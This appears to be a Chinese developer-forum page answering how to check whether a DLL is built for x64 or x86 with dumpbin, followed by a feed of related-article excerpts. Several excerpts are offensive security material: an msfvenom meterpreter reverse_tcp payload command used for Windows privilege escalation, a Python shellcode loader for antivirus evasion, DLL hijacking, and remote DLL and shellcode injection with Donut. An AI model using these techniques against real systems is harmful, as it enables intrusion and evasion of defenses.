首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

如何查找本机DLL文件是否编译为x64或x86?

要查找本机DLL文件是否编译为x64或x86,可以使用Windows自带的工具。以下是具体步骤:

  1. 打开命令提示符(CMD)。
  2. 输入以下命令:dumpbin /headers [DLL文件路径],例如:dumpbin /headers C:\Windows\System32\kernel32.dll
  3. 按回车键执行命令。
  4. 在输出结果中查找“machine”一项,如果该项的值为x64,则DLL文件是编译为x64的;如果该项的值为x86,则DLL文件是编译为x86的。

需要注意的是,如果您没有安装Visual Studio或Windows SDK,可能需要下载并安装相应的工具才能使用dumpbin命令。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

CoreHook:基于.NET Core运行时实现的Windows HOOK库

将coreload32.dll (X86, ARM)和/coreload64.dll (X64, ARM64)二进制文件放在程序的输出目录中。...然后,将corehook32.dll (X86, ARM)和/corehook64.dll (X64, ARM64)二进制文件放在同一个输出目录中。这些是使用上述示例所需的所有文件。...要使符号查找起作用,您必须将PDB文件放在要挂钩的目标程序的目录中,将环境变量_NT_SYMBOL_PATH设置为符号服务器。...要点:要使用完整的符号查找,您需要同时拥有dbghelp.dll(提供符号查找API)和symsrv.dll(提供符号服务器查找)并在DLL搜索路径中。...您可以通过运行符号测试来确认是否正确配置了符号支持。 *参考来源:github,FB小周大涛编译,转载请注明来自FreeBuf.COM

1.7K20

WPF dotnet 使用本机映像 native 优化 dotnet framework 二进制文件

: 设置目标的框架平台是 4.6.2 或以上 配置目标平台是 x86 x64 换句话说是不要设置为 AnyCpu 的 添加一个神奇的 NuGet 库 使用 Release 构建 设置目标的框架平台是... x64 平台 本机映像编译器需要根据给定的平台优化代码。...为了使用本机映像编译器就需要配置自己的项目特别为 x86 x64 构建 如果一个解决方案里面包含了多个项目,只需要设置入口项目,也就是启动项目作为 x86 x64 进行构建。...A: 可以点击 VisualStudio 的右上角的反馈按钮反馈,详细请看 如何报告 Visual Studio 的问题 Q: 这个优化的本机映像对原有的二进制文件影响是什么?...A: 这个优化的二进制文件将包含托管代码和本机代码,会让最终输出的文件更大 Q: 我是否可以在项目中使用这个技术?

1.1K20
  • C# 如何在项目引用x86 x64的非托管代码

    因为现在的项目使用的是 AnyCpu 在 x86 的设备使用的是x86,在x64使用的是x64,但是对于非托管代码,必须要在x64使用x64dll,在x86使用x86dll。...在C++没有和C#一样的 AnyCpu 所以需要在项目运行在x86的时候加载x86dll。 本文告诉大家如何在代码引用不同的dll。...多了,一个dll都需要写三次,看起来代码还是很烂 设置查找文件 实际上好多人都觉得,应用程序首先是从运行的目录开始查找dll,如果找不到,就去GAC查找,如果还是找不到,就去System查找。...实际上这句话是不对的,在没有设置默认查找文件的时候就是这样,但是软件是可以设置查找文件。...private static extern bool SetDllDirectory(string path); 需要先把 x86dll 放在程序的 x86文件夹,当然对于x64的大家也知道放哪里

    73620

    C# 如何在项目引用x86 x64的非托管代码

    因为现在的项目使用的是 AnyCpu 在 x86 的设备使用的是x86,在x64使用的是x64,但是对于非托管代码,必须要在x64使用x64dll,在x86使用x86dll。...在C++没有和C#一样的 AnyCpu 所以需要在项目运行在x86的时候加载x86dll。 本文告诉大家如何在代码引用不同的dll。...多了,一个dll都需要写三次,看起来代码还是很烂 设置查找文件 实际上好多人都觉得,应用程序首先是从运行的目录开始查找dll,如果找不到,就去GAC查找,如果还是找不到,就去System查找。...实际上这句话是不对的,在没有设置默认查找文件的时候就是这样,但是软件是可以设置查找文件。...private static extern bool SetDllDirectory(string path); 需要先把 x86dll 放在程序的 x86文件夹,当然对于x64的大家也知道放哪里

    2.1K10

    Windows下适用于PHP 7.1的memcache扩展工具编译

    文件夹中,想要开启扩展,必须在ext文件夹中有相应的dll文件,并且在php.ini文件里面加入相应的配置,格式举例如下: extension=php_memcache.dll 由于php_memcache.dll...MD %_%\vc14\x86\deps\lib MD %_%\vc14\x86\deps\include MD %_%\vc14\x64\deps\bin MD %_%\vc14\x64\deps...4、在开始菜单找到并打开 VS2015 x64 本机工具命令提示符(注:如果要编译32位的,则需进入VS2015 x86 本机工具命令提示符),用cd 命令进入 E:\PHPCompile,执行如下两条命令...\phpdev\vc14\x64\,把deps-7.1-vc14-x64.7z解压到该目录下,覆盖deps文件夹 7、 把php源代码也解压到x64目录下,将解压后的目录名改为PHP7 8、在x64目录下创建...pecl文件夹,在该文件夹下再建立memcache文件夹,将下载的memcache代码解压到这个目录下,再在x64目录下创建obj文件,用来存放编译后的文件 编译 在刚才的 VS2015 x64 本机工具命令提示符执行以下命令

    83430

    在Visual Studio2013中编译使用libcurl库

    为了使用Visual Studio 2013编译出X86环境的libcurl库,我使用的是:VS2013 x86 本机工具命令提示,当然如果想编译成X64的库,可以选择VS2013 x64 本机工具命令提示或者...打开VS2013 x86 本机工具命令提示的快捷方式,进入libcurl源代码的目录,例如我的curl源代码目录放E:\SoftDevelop\CPlus\VCProject2013\curl-7.67.0...关于使用VS2013 x86本机工具命令提示编译libcurl源代码,采用的是VC的nmake命令,相当于Windows下的make工具。...可以编译生成x64的库,默认是x86的。...当然我使用的debug x86模式的程序,release的x86也类似,x64的也是,加上对应的头文件和库文件即可。 头文件加入后,相关的红色错误消失了,如下图所示: ?

    5.2K20

    .NET混合开发解决方案15 WebView2控件集成到WinForm程序编译后的文件及结构说明

    WinForm程序中集成WebView2控件后,编译项目(不运行),查看编译后的内容如下 多了一个runtimes目录 三个子目录下包含相同的内容 WebView2Loader.dll是一个本机的...、特定于体系结构的二进制文件,开发者需要包含希望的应用程序在其中运行的所有二进制文件。...例如: 对于 x86,将包括 x86 版本的 WebView2Loader.dll。 对于使用 AnyCPU 的托管应用,将包括 x86x64 和 arm64 版本。...WebView2Loader.dll 正确的版本从适当的特定于体系结构的文件夹加载  简单的说该DLL是一个引导程序,根据项目的目标平台类型,加载对应版本的WebView2控件的运行时环境。...(Microsoft.Web.WebView2.WinForms.dllMicrosoft.Web.WebView2.WPF.dll)。

    1.4K10

    恶意代码分析实战总结

    :F4 运行:F9 查看内存:Alt+M 查看断点:Alt+B 你是如何进行病毒分析的 病毒行为鉴定如果鉴定样本是否为病毒,是通过行为来判断的,大多数病毒的行为有一下几种: (1) 拷贝自身文件到系统目录下...; (7) 设置键盘钩子鼠标钩子,监视正常用户的操作; (8) 替换系统文件; (9) 感染可执行文件; (10)设置注册表键值,自启动隐藏; (11)连接远程地址,下载恶意文件并执行;...64位的程序有所了解 x64x86的区别: 所有地址和指针都是64位,通用寄存器数量增加,地址位数也增加,x86不能相对于某个寄存器的偏移寻址,要绝对地址 window首先支持的是Itanium,与x86...Intel采用了AMD64,并称它的实现为EM64T,这个架构现在被称为x64x86-64 x86的指令不是位置无关的,x64指令将数据地址作为一个相对当前指令指针的偏移进行存储 x64调用约定和fastcall...注入:强迫一个远程进程加载恶意dll程序,首先查找目标进程,用openProcess获取目标进程的句柄,用CreateRemoteThread在远程进程中创建新线程 直接注入:一般会有两次分配空间,插入代码

    2.5K20

    Windows提权总结(超详细)

    wmic process list brief 查询本机进程 net share 查看本机共享列表 netsh firewall show config 查看防火墙配置 系统内核溢出漏洞 手工查找补丁...;更改账户类型 - 更改UAC的设置 - 安装ActiveX;安装、卸载程序 - 安装设备驱动程序 - 将文件移动/复制到ProgramFilesWindows目录下 - 查看其它用户的文件夹 绕过...这样攻击者就可以命名一个为Program.exe的后门文件放在c盘下,进而等待含漏洞服务路径的启动重启导致后门文件的执行。...模拟攻击 kali生成木马: msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 11 -b '\x00...如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径。

    37710

    免杀初探:python加载shellcode免杀与国内主流杀软大战六个回合

    其后缀名多为.dll, dll文件中包含一个多个已被编译、链接并与使用它们的进程分开存储的函数。我们经常在程序安装目录下看到它们。...接下来,点击生成→生成解决方案即可生成一个.dll文件 那么如何使用python加载dll,并调用里面的函数呢?...最后将刚才生成的DLL文件放到py文件同目录下,运行py文件: 注意这里有坑,如果你的python是64位的,生成dll 文件时debug一定要选x64,不然运行py文件调用dll时会报错,32位python...将代码编写好,最后点击生成→生成解决方案,将其编译为exe文件 注意此处有坑,生成解决方案时请在工具栏中选择release x86,不然会报如下错,win7,win10都一样 看下免杀效果:火绒,360...位的环境中又是没问题的,造成这样的原因是x86x64的兼容性问题。

    3.5K10

    Donut - 将 .NET 程序集作为 Shellcode 注入

    公共语言运行时:与 Java 一样,.NET 使用运行时环境(“虚拟机”)在运行时解释代码。所有 .NET 代码在执行前都从一种中间语言编译为“即时”本机代码。...程序集使用 PE 格式的扩展,并表示为包含 CIL 而不是本机机器代码的 EXE DLL。 应用程序域:程序集在称为应用程序域的安全“盒子”内运行。...可以与任何 Windows 进程一起使用,无论其体系结构如何以及是否加载了 CLR。 允许您将该代码注入远程(不同)进程本地(当前)进程。 允许您确定注入发生的方式。 适用于多种类型的进程注入。...Donut 是一个 shellcode 生成工具,可以从 .NET 程序集创建 x86 x64 shellcode 有效负载。此 shellcode 可用于将程序集注入任意 Windows 进程。...与 CLR 关联的 DLL 均以“msco”开头,例如“mscorlib.dll”和“mscoree.dll”。因此,我们观察它们的加载,然后检查加载它们的程序是否是有效的 .NET 程序集。

    2K00

    使用DLLHSC扫描DLL劫持目标

    此存储库包含工具的Visual Studio项目文件(DLLHSC)、API钩子功能的项目文件(detour)、Payload项目文件以及针对x86x64体系结构的已编译可执行文件。...DLLHSC实现了这个工具的核心功能,detour项目生成一个用于钩住API的DLL文件,Payload项目负责生成用作概念验证的DLL,广大研究人员可以测试可执行文件并查看是否可以通过搜索顺序劫持技术来加载它...生成的Payload必须与DLLHSC存放在同一目录中,detour生成的文件名分别为payload32.dll(针对x86体系架构)和payload64.dll(针对x64体系架构)。...接下来,工具将启动应用程序,并通过检查临时文件是否存在来报告是否执行了Payload DLL。...请注意,从项目Payload生成的DLL必须重命名为payload32.DLL(针对32位体系结构)payload64.DLL(针对64位体系结构)。

    1.1K20

    Windows 下使用 ffmpeg 库

    在Windows下搭建 ffmpeg 开发环境可以分为以下几个步骤: 编译出 Windows可以使用的ffmpeg 使用VS创建工程时,选择好 x86 x64 架构指令集 指定 ffmpeg 头文件目录路径...VS中选择 x86 x64 当 ffmpeg 库编译好之后,我们该如何使和它呢?我们以 VS 来例来进行一下讲解。 第一步是在VS创建的工程中要选择使用x86还是使用x64。它们有什么区别呢?...由于目前大多数系统都是64位的了,所以我建议尽可以的编译成 x64 程序。 ? 另外需要注意的是,我们在选择 x86 x64时,也要注意是否与我们前面编译的 ffmpeg 是一致的?...指定 ffmpeg 头文件路径 选择好输出是 x86 x64 之后,接下来我们就要给工程指定 ffmpeg 的头文件路径了。...下面我们就看看该如何设置吧。 ? 拷贝DLL文件到执行目录 最后一步就是将编译好的 ffmpeg 库文件放到编译后的可执行文件目录下就好了。直接上图了: ?

    3.2K50
    领券